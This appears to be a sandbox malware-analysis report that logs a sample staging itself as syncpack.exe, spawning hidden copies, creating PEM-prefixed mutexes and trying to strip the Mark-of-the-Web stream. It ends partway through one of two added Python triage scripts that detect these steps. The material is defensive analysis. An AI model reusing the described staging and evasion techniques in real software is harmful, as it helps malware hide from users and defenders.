msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x76260000 0x7637cfff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x76470000 0x7647bfff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x773c0000 0x77416fff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x77bb0000 0x77bb5fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Host Behavior
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe os_pid = 0xb70, creation_flags = CREATE_HIGH_PRIORITY_CLASS, show_window = SW_HIDE True 1
Fn
Module (19)
»
Operation Module Additional Information Success Count Logfile
Load USER32.dll base_address = 0x771c0000 True 1
Fn
Load KERNEL32.dll base_address = 0x75fb0000 True 1
Fn
Get Filename - process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe, file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe, size = 260 True 1
Fn
Get Address - function = VirtualAlloc, ordinal = 0, address_out = 0x18fc4c True 1
Fn
Get Address - function = VirtualAlloc, ordinal = 0, address_out = 0x18fc8c True 1
Fn
Get Address - function = GetProcAddress, ordinal = 0, address_out = 0x18fb30 True 1
Fn
Get Address - function = VirtualAlloc, ordinal = 0, address_out = 0x18fb30 True 1
Fn
Get Address - function = VirtualProtect, ordinal = 0, address_out = 0x18fb30 True 1
Fn
Get Address - function = LoadLibraryA, ordinal = 0, address_out = 0x18fb30 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = wsprintfA, address_out = 0x771eae5f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x77c0e026 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeConsole, address_out = 0x76066aa8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenA, address_out = 0x75fc5a4b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpA, address_out = 0x75fdeceb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount, address_out = 0x75fc110c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x75fc14e9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x75fc14c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x75fc1809 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x75fc11f8 True 1
Fn
System (324)
»
Operation Additional Information Success Count Logfile
Get Time type = Ticks, time = 198667 True 40
Fn
Get Time type = Ticks, time = 198682 True 65
Fn
Get Time type = Ticks, time = 198698 True 53
Fn
Get Time type = Ticks, time = 198714 True 51
Fn
Get Time type = Ticks, time = 198729 True 40
Fn
Get Time type = Ticks, time = 202411 True 10
Fn
Get Time type = Ticks, time = 202426 True 13
Fn
Get Time type = Ticks, time = 202442 True 4
Fn
Get Info type = Operating System True 48
Fn
Mutex (2)
»
Operation Additional Information Success Count Logfile
Create mutex_name = PEMB50 True 1
Fn
Create mutex_name = PEMB64 True 1
Fn
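The File, Process and Mutex tables for the 280.exe instance (PID 0xb50) and the first syncpack.exe instance (PID 0xb64, parent 0xb50) show a short staging sequence: the dropped executable is moved from %LOCALAPPDATA%\Temp into %LOCALAPPDATA%\Microsoft\Windows\syncpack.exe, a delete of the Zone.Identifier alternate data stream on the moved file is attempted and fails, the moved copy is launched with SW_HIDE, and each instance creates mutexes named PEM followed by a hex PID (0xb64 creates PEMB50 and PEMB64, matching its parent and its own PID). The script below is an added triage example written for this page; it is not VMRay code and not part of the report. The event tuples are constructed by hand from the rows on this page, the path regexes are assumptions about where a sandbox-style log would place these values, and the PEM<hex PID> rule is inferred from this report's data only.

```python
"""Triage checks over sandbox 'Host Behavior' rows (added example, not VMRay code)."""
import re

# --- Input constructed from this report's tables ---------------------------------
# PID -> parent PID, taken from the "OS Process Information" blocks. The parent of
# 280.exe (0xb50) is outside this excerpt, so it is recorded as None.
PROCESS_TREE = {0xB50: None, 0xB64: 0xB50, 0xB70: 0xB64}

STAGED = r"C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe"
DROPPED = r"C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe"

# (pid, category, operation, target, additional_information, success) per report row
EVENTS = [
    (0xB50, "File", "Create", DROPPED, "desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ", True),
    (0xB50, "File", "Move", STAGED, "source_filename = " + DROPPED, True),
    (0xB50, "File", "Delete", STAGED + ":Zone.Identifier", "-", False),
    (0xB50, "Process", "Create", STAGED, "os_pid = 0xb64, show_window = SW_HIDE", True),
    (0xB50, "Mutex", "Create", "", "mutex_name = PEMB40", True),
    (0xB50, "Mutex", "Create", "", r"mutex_name = Global\I78B0A7D7", True),
    (0xB50, "Mutex", "Create", "", r"mutex_name = Global\M78B0A7D7", True),
    (0xB64, "Process", "Create", STAGED,
     "os_pid = 0xb70, creation_flags = CREATE_HIGH_PRIORITY_CLASS, show_window = SW_HIDE", True),
    (0xB64, "Mutex", "Create", "", "mutex_name = PEMB50", True),
    (0xB64, "Mutex", "Create", "", "mutex_name = PEMB64", True),
]

# Assumed path patterns: an .exe under the user's Temp directory, an .exe under
# %LOCALAPPDATA%\Microsoft\Windows, and the Mark-of-the-Web alternate data stream.
TEMP_EXE = re.compile(r"\\AppData\\Local\\Temp\\[^\\]+\.exe$", re.I)
LOCALAPP_MS_EXE = re.compile(r"\\AppData\\Local\\Microsoft\\Windows\\[^\\]+\.exe$", re.I)
ZONE_ADS = re.compile(r":Zone\.Identifier$", re.I)
PEM_MUTEX = re.compile(r"^PEM([0-9A-F]+)$")


def parse_kv(info):
    """Turn 'a = 1, b = 2' from the Additional Information column into a dict."""
    out = {}
    for part in info.split(", "):
        if " = " in part:
            key, value = part.split(" = ", 1)
            out[key.strip()] = value.strip()
    return out


def expected_pem_mutexes(pid, ppid):
    """PEM<hex PID> names for a process and its parent, the pattern seen in this
    report (0xb64 with parent 0xb50 creates PEMB50 and PEMB64). Inferred, not documented."""
    names = {"PEM%X" % pid}
    if ppid is not None:
        names.add("PEM%X" % ppid)
    return names


def triage(events, tree):
    """Walk the rows in order and emit findings for the staging sequence."""
    findings = []
    staged = set()  # lower-cased paths of executables moved out of Temp
    for pid, cat, op, target, info, ok in events:
        kv = parse_kv(info)
        if cat == "File" and op == "Move" and TEMP_EXE.search(kv.get("source_filename", "")) \
                and LOCALAPP_MS_EXE.search(target):
            staged.add(target.lower())
            findings.append({"pid": pid, "kind": "staged_copy", "path": target})
        elif cat == "File" and op == "Delete" and ZONE_ADS.search(target):
            # Removing the Zone.Identifier stream strips Mark-of-the-Web; keep the
            # success flag, since here the report shows the delete failed.
            findings.append({"pid": pid, "kind": "motw_strip_attempt", "path": target, "success": ok})
        elif cat == "Process" and op == "Create" and kv.get("show_window") == "SW_HIDE" \
                and target.lower() in staged:
            findings.append({"pid": pid, "kind": "hidden_spawn_of_staged_copy",
                             "child_pid": int(kv["os_pid"], 16)})
        elif cat == "Mutex" and op == "Create":
            match = PEM_MUTEX.match(kv.get("mutex_name", ""))
            if match:
                value = int(match.group(1), 16)
                relation = "self" if value == pid else "parent" if value == tree.get(pid) else "unknown"
                findings.append({"pid": pid, "kind": "pem_pid_mutex",
                                 "name": kv["mutex_name"], "relation": relation})
    return findings


if __name__ == "__main__":
    for finding in triage(EVENTS, PROCESS_TREE):
        print(finding)
```

The mutex check is the one to treat with care: PEMB40 created by 0xb50 resolves to "unknown" only because that process's parent is not in this excerpt, so a sighting of an unmatched PEM mutex in a real log is a prompt to look one level higher in the process tree, not a negative result. The failed Zone.Identifier delete is reported with its success flag rather than dropped, because the attempt itself is the signal.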
Process #6: syncpack.exe
2216 37
»
Information Value
ID #6
File Name c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe
Command Line "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe"
Initial Working Directory C:\Users\kFT6uTQW\Desktop\
Monitor Start Time: 00:02:25, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:02:43
OS Process Information
»
Information Value
PID 0xb70
Parent PID 0xb64 (c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0xB74
0xB88
0xB94
0xB98
0xB9C
0xBA4
0xBDC
0x568
0x878
0x86C
0x868
0x864
0x860
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False -
private_0x0000000000090000 0x00090000 0x0018ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000190000 0x00190000 0x00193fff Pagefile Backed Memory Readable True False False -
locale.nls 0x001a0000 0x00206fff Memory Mapped File Readable False False False -
private_0x0000000000210000 0x00210000 0x0021ffff Private Memory Readable, Writable True False False -
private_0x0000000000220000 0x00220000 0x0022cfff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000230000 0x00230000 0x0023cfff Private Memory Readable, Writable True False False -
private_0x0000000000240000 0x00240000 0x0025ffff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000260000 0x00260000 0x002dffff Private Memory Readable, Writable True False False -
private_0x00000000002e0000 0x002e0000 0x002effff Private Memory Readable, Writable True False False -
pagefile_0x00000000002e0000 0x002e0000 0x002e7fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000002e0000 0x002e0000 0x0031ffff Private Memory Readable, Writable True False False -
pagefile_0x00000000002f0000 0x002f0000 0x002f7fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000320000 0x00320000 0x00320fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000330000 0x00330000 0x0033ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000330000 0x00330000 0x00337fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000330000 0x00330000 0x00331fff Pagefile Backed Memory Readable True False False -
private_0x0000000000340000 0x00340000 0x0034ffff Private Memory Readable, Writable True False False -
rsaenh.dll 0x00350000 0x0038bfff Memory Mapped File Readable False False False -
pagefile_0x0000000000350000 0x00350000 0x00357fff Pagefile Backed Memory Readable, Writable True False False -
windowsshell.manifest 0x00350000 0x00350fff Memory Mapped File Readable False False False -
index.dat 0x00350000 0x0035bfff Memory Mapped File Readable, Writable True False False -
pagefile_0x0000000000360000 0x00360000 0x00361fff Pagefile Backed Memory Readable True False False -
index.dat 0x00370000 0x00377fff Memory Mapped File Readable, Writable True False False -
index.dat 0x00380000 0x0038ffff Memory Mapped File Readable, Writable True False False -
private_0x0000000000390000 0x00390000 0x003cffff Private Memory Readable, Writable True False False -
private_0x00000000003d0000 0x003d0000 0x003d0fff Private Memory Readable, Writable True False False -
pagefile_0x00000000003d0000 0x003d0000 0x003d0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000003e0000 0x003e0000 0x003e0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000003f0000 0x003f0000 0x003f0fff Pagefile Backed Memory Readable True False False -
wi 0x00400000 0x0041afff Memory Mapped File Readable, Writable, Executable True False False -
private_0x0000000000420000 0x00420000 0x0045ffff Private Memory Readable, Writable True False False -
private_0x0000000000460000 0x00460000 0x0049ffff Private Memory Readable, Writable True False False -
private_0x00000000004a0000 0x004a0000 0x004dffff Private Memory Readable, Writable True False False -
private_0x00000000004e0000 0x004e0000 0x005dffff Private Memory Readable, Writable True False False -
pagefile_0x00000000005e0000 0x005e0000 0x00767fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000770000 0x00770000 0x008f0fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000900000 0x00900000 0x01cfffff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x01d00000 0x01fcefff Memory Mapped File Readable False False False -
private_0x0000000001fd0000 0x01fd0000 0x020cffff Private Memory Readable, Writable True False False -
private_0x00000000020d0000 0x020d0000 0x0221ffff Private Memory Readable, Writable True False False -
private_0x00000000020d0000 0x020d0000 0x021cffff Private Memory Readable, Writable True False False -
private_0x00000000021d0000 0x021d0000 0x021dffff Private Memory Readable, Writable True False False -
pagefile_0x00000000021d0000 0x021d0000 0x021d7fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000021d0000 0x021d0000 0x021d5fff Private Memory Readable, Writable, Executable True False False -
private_0x00000000021e0000 0x021e0000 0x0221ffff Private Memory Readable, Writable True False False -
private_0x0000000002220000 0x02220000 0x0231ffff Private Memory Readable, Writable True False False -
private_0x0000000002320000 0x02320000 0x0241ffff Private Memory Readable, Writable True False False -
private_0x0000000002420000 0x02420000 0x0251ffff Private Memory Readable, Writable True False False -
private_0x0000000002520000 0x02520000 0x0271ffff Private Memory Readable, Writable True False False -
private_0x0000000002520000 0x02520000 0x026bffff Private Memory Readable, Writable True False False -
private_0x0000000002520000 0x02520000 0x0261ffff Private Memory Readable, Writable True False False -
private_0x0000000002620000 0x02620000 0x0265ffff Private Memory Readable, Writable True False False -
private_0x0000000002660000 0x02660000 0x0269ffff Private Memory Readable, Writable True False False -
pagefile_0x00000000026a0000 0x026a0000 0x026a7fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000026b0000 0x026b0000 0x026bffff Private Memory Readable, Writable True False False -
private_0x00000000026c0000 0x026c0000 0x026e3fff Private Memory Readable, Writable, Executable True False False -
d3a3.tmp 0x026f0000 0x026f0fff Memory Mapped File Readable True True False
private_0x0000000002710000 0x02710000 0x0271ffff Private Memory Readable, Writable True False False -
private_0x0000000002720000 0x02720000 0x0281ffff Private Memory Readable, Writable True False False -
private_0x0000000002840000 0x02840000 0x0287ffff Private Memory Readable, Writable True False False -
private_0x0000000002880000 0x02880000 0x0297ffff Private Memory Readable, Writable True False False -
private_0x0000000002980000 0x02980000 0x029bffff Private Memory Readable, Writable True False False -
private_0x00000000029c0000 0x029c0000 0x02abffff Private Memory Readable, Writable True False False -
private_0x0000000002ac0000 0x02ac0000 0x02afafff Private Memory Readable, Writable, Executable True False False -
private_0x0000000002b00000 0x02b00000 0x02b3ffff Private Memory Readable, Writable True False False -
rasman.dll 0x6c9a0000 0x6c9b4fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x703e0000 0x7041afff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x74310000 0x74325fff Memory Mapped File Readable, Writable, Executable False False False -
ntmarta.dll 0x74380000 0x743a0fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrtremote.dll 0x743c0000 0x743cdfff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x74720000 0x7472afff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x747f0000 0x7498dfff Memory Mapped File Readable, Writable, Executable False False False -
rasapi32.dll 0x74d60000 0x74db1fff Memory Mapped File Readable, Writable, Executable False False False -
dhcpcsvc6.dll 0x74e10000 0x74e1cfff Memory Mapped File Readable, Writable, Executable False False False -
netprofm.dll 0x74e20000 0x74e79fff Memory Mapped File Readable, Writable, Executable False False False -
fwpuclnt.dll 0x74e80000 0x74eb7fff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
dhcpcsvc.dll 0x75110000 0x75121fff Memory Mapped File Readable, Writable, Executable False False False -
npmproxy.dll 0x75130000 0x75137fff Memory Mapped File Readable, Writable, Executable False False False -
wship6.dll 0x75140000 0x75145fff Memory Mapped File Readable, Writable, Executable False False False -
wshtcpip.dll 0x75150000 0x75154fff Memory Mapped File Readable, Writable, Executable False False False -
winrnr.dll 0x75160000 0x75167fff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x75170000 0x751abfff Memory Mapped File Readable, Writable, Executable False False False -
pnrpnsp.dll 0x751b0000 0x751c1fff Memory Mapped File Readable, Writable, Executable False False False -
napinsp.dll 0x751d0000 0x751dffff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x751e0000 0x751e5fff Memory Mapped File Readable, Writable, Executable False False False -
nlaapi.dll 0x751f0000 0x751fffff Memory Mapped File Readable, Writable, Executable False False False -
sensapi.dll 0x75200000 0x75205fff Memory Mapped File Readable, Writable, Executable False False False -
rtutils.dll 0x75210000 0x7521cfff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x75220000 0x75226fff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x75230000 0x75273fff Memory Mapped File Readable, Writable, Executable False False False -
userenv.dll 0x75290000 0x752a6fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x752b0000 0x752cbfff Memory Mapped File Readable, Writable, Executable False False False -
wtsapi32.dll 0x75420000 0x7542cfff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x75870000 0x759a5fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x75a00000 0x75a8efff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x75af0000 0x75b24fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x75be0000 0x75d3bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x76260000 0x7637cfff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x76390000 0x76412fff Memory Mapped File Readable, Writable, Executable False False False -
wldap32.dll 0x76420000 0x76464fff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x76470000 0x7647bfff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x76480000 0x770c9fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x772c0000 0x773b4fff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x773c0000 0x77416fff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x77450000 0x7764afff Memory Mapped File Readable, Writable, Executable False False False -
normaliz.dll 0x77660000 0x77662fff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x77bb0000 0x77bb5fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007efa1000 0x7efa1000 0x7efa3fff Private Memory Readable, Writable True False False -
private_0x000000007efa4000 0x7efa4000 0x7efa6fff Private Memory Readable, Writable True False False -
private_0x000000007efa7000 0x7efa7000 0x7efa9fff Private Memory Readable, Writable True False False -
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False -
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
For performance reasons, the remaining 44 entries are omitted.
The remaining entries can be found in flog.txt.
Created Files
Filename | File Size | MD5 | SHA1 | SHA256 | YARA Match
c:\users\kft6utqw\appdata\local\temp\d3a3.tmp | 0.00 KB | d41d8cd98f00b204e9800998ecf8427e | da39a3ee5e6b4b0d3255bfef95601890afd80709 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 | False
c:\users\kft6utqw\appdata\local\temp\d3d3.tmp | 0.00 KB | d41d8cd98f00b204e9800998ecf8427e | da39a3ee5e6b4b0d3255bfef95601890afd80709 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 | False
c:\users\kft6utqw\appdata\local\temp\d3d4.tmp | 0.00 KB | d41d8cd98f00b204e9800998ecf8427e | da39a3ee5e6b4b0d3255bfef95601890afd80709 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 | False
c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack_.exe | 0.00 KB | d41d8cd98f00b204e9800998ecf8427e | da39a3ee5e6b4b0d3255bfef95601890afd80709 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 | False
c:\programdata\oyvgkgw.exe | 328.05 KB | cbe11e9a9e71737f15e8f1c606ad8d8c | 2d4575457d337753a57b7941d13ac9665342641a | 6e143481553f9ae7566d2245450f6fe65734b465df03e43905f0fb19f812b343 | False
c:\users\kft6utqw\appdata\local\temp\d3d3.tmp | 0.05 KB | f82e7a2f3860bbe2226620e0a569d5bb | 4e7c4099d0597bc28f4ffea6a00d6c44341ee04c | b1d64604932a6676690fda7132f96766bd05ed9118247d8ab4c642e9ddbf95f2 | False
c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack_.exe | 77.50 KB | 3290d6946b5e30e70414990574883ddb | be0144e3235ffde0787e9f1cd34c828ec87d8e19 | 0e9294e1991572256b3cda6b031db9f39ca601385515ee59f1f601725b889663 | False
c:\users\kft6utqw\appdata\local\temp\d3a3.tmp | 0.09 KB | 373017c133fb80b96aaec222ce291d38 | 08db0aebdfd799ce29aa3086abfac8dfccc6816e | 5571ede5f2c75cadcf4f20a7388db611cff807b47b7a564f853f2cac8af2eb04 | False
c:\users\kft6utqw\appdata\local\temp\d3d4.tmp | 0.11 KB | 36427ecb2a0faf13af3047c51b29f9c5 | 9a3fb26927a7aa81255cf8abcc1f1c3e38f28c4f | ea156f649bb1180b32c6d5be76c0969941ec76d1fface734f401b5327ac57345 | False
The four 0.00 KB rows carry the MD5/SHA1/SHA256 digests of zero-length input: a path is logged once when its handle is created, before any bytes are written, and again after the last write, so the later row for a path is the one to use as an indicator. The 328.05 KB oyvgkgw.exe matches the 335922-byte Write recorded under File below, and syncpack_.exe is a Copy of C:\Windows\system32\alg.exe (also under File), not a downloaded file.
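As an added example (not part of the VMRay report), the following Python collapses the table above into one record per path, shows that the 0.00 KB rows are empty-input placeholders rather than zero-byte artefacts by recomputing the digests instead of trusting them, and cross-checks a printed size against the byte count of a Write from the File table. The tag names and the "user-writable" directory list are this example's own convention.

```python
"""Reduce a sandbox 'Created Files' list to final-content indicators.

Added example, not part of the VMRay report. CREATED_FILES is the Created
Files table of this report transcribed by hand. A sandbox logs a file when
its handle is created (size 0, digests of empty input) and again after the
last write; only the later record is a usable indicator. Tag names and the
"user-writable" directory list are this example's own convention.
"""
import hashlib
from collections import OrderedDict

# Digests of zero-length input, computed rather than copied so the
# placeholder test cannot drift from the real values.
EMPTY = (hashlib.md5(b"").hexdigest(), hashlib.sha1(b"").hexdigest(),
         hashlib.sha256(b"").hexdigest())

# The digests printed on the 0.00 KB rows of the report.
EMPTY_AS_REPORTED = ("d41d8cd98f00b204e9800998ecf8427e",
                     "da39a3ee5e6b4b0d3255bfef95601890afd80709",
                     "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855")

# (path, size in KB as printed, md5, sha1, sha256), report order
CREATED_FILES = [
    (r"c:\users\kft6utqw\appdata\local\temp\d3a3.tmp", 0.00, *EMPTY_AS_REPORTED),
    (r"c:\users\kft6utqw\appdata\local\temp\d3d3.tmp", 0.00, *EMPTY_AS_REPORTED),
    (r"c:\users\kft6utqw\appdata\local\temp\d3d4.tmp", 0.00, *EMPTY_AS_REPORTED),
    (r"c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack_.exe", 0.00, *EMPTY_AS_REPORTED),
    (r"c:\programdata\oyvgkgw.exe", 328.05,
     "cbe11e9a9e71737f15e8f1c606ad8d8c", "2d4575457d337753a57b7941d13ac9665342641a",
     "6e143481553f9ae7566d2245450f6fe65734b465df03e43905f0fb19f812b343"),
    (r"c:\users\kft6utqw\appdata\local\temp\d3d3.tmp", 0.05,
     "f82e7a2f3860bbe2226620e0a569d5bb", "4e7c4099d0597bc28f4ffea6a00d6c44341ee04c",
     "b1d64604932a6676690fda7132f96766bd05ed9118247d8ab4c642e9ddbf95f2"),
    (r"c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack_.exe", 77.50,
     "3290d6946b5e30e70414990574883ddb", "be0144e3235ffde0787e9f1cd34c828ec87d8e19",
     "0e9294e1991572256b3cda6b031db9f39ca601385515ee59f1f601725b889663"),
    (r"c:\users\kft6utqw\appdata\local\temp\d3a3.tmp", 0.09,
     "373017c133fb80b96aaec222ce291d38", "08db0aebdfd799ce29aa3086abfac8dfccc6816e",
     "5571ede5f2c75cadcf4f20a7388db611cff807b47b7a564f853f2cac8af2eb04"),
    (r"c:\users\kft6utqw\appdata\local\temp\d3d4.tmp", 0.11,
     "36427ecb2a0faf13af3047c51b29f9c5", "9a3fb26927a7aa81255cf8abcc1f1c3e38f28c4f",
     "ea156f649bb1180b32c6d5be76c0969941ec76d1fface734f401b5327ac57345"),
]

# Directories a Medium-integrity process can write to (example convention).
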